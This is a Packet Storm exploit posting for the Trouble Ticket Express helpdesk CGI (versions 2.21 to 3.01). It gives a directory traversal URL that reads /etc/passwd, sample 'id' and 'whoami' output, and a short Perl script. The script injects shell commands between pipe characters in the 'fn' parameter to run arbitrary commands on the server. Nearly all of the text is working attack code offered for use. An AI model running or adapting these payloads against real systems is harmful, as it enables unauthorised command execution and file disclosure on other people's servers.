Trouble Ticket Express Code Execution / Traversal

2010-03-15T00:00:00
ID PACKETSTORM:87236
Type packetstorm
Reporter zombiefx
Modified 2010-03-15T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal  
# Author: zombiefx <darkernet@gmail.com<mailto:darkernet@gmail.com>>  
# Software Link: http://www.troubleticketexpress.com/download/ttx301.zip  
# Version: v3.01,v3.0,v2.24,v2.21  
# Tested on: Linux  
# CVE :  
# Code:  
  
# This is only possible if an attachment input is available.  
# Directory Traversal Vuln is  
# http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd  
# Simple perl code to run commands on the box  
# $ id  
# uid=0(httpd) gid=0(httpd) groups=0(httpd)  
# $ whoami  
# httpd  
  
#!/usr/bin/perl  
use warnings;  
use strict;  
use LWP::Simple;  
my $url = 'http://localhost/cgi-bin/ttx.cgi';  
print '$ ';  
while (<>) {  
print get( $url . '?cmd=file&fn=|' . $_ . '|' );  
print '$ ';  
}  
<mailto:darkernet@gmail.com>  
  
  
  
`